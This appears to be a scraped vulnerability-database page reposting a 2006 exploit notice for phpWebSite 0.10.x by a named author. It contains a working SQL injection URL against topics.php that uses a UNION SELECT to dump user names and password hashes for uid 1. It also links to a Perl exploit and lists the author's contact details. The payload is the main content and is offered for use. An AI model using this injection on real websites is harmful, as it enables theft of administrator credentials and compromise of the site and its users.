Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12215
HistoryApr 14, 2006 - 12:00 a.m.

phpWebSite 0.10.? (topics.php) Remote SQL Injection Exploit

2006-04-1400:00:00
vulners.com
10

phpWebSite <= 0.10.? (topics.php) Remote SQL Injection Exploit

Discovered By SnIpEr_SA
Author : SnIpEr_SA
Exploit in Perl : http://www.milw0rm.com/exploits/1525
Remote : Yes
Local : No
Critical Level : Dangerous

Affected software description:


Application : phpWebSite
version     : 0.10.?
URL         : http://phpwebsite.appstate.edu/
... 
------------------------------------------------------------------ 
Exploit:
~~~~~~~~ 
# http://example.com/path/topics.php?op=viewtopic&amp;topic=-1 Union select name,name,pass,name From users where uid=1

--------------------------------------------------------------------------- 
Contact:
 ~~~~~~~~
 SnIpEr_SA
E-mail: selfar2002@hotmail.com
E-mail: SnIpEr_SA[at]Basdmail[dot]org
Homepage: http://www.3asfh.com/  &amp; http://www.lezr.com/
Greetz: All My Frind
 -------------------------------- [ EOF ] ----------------------------------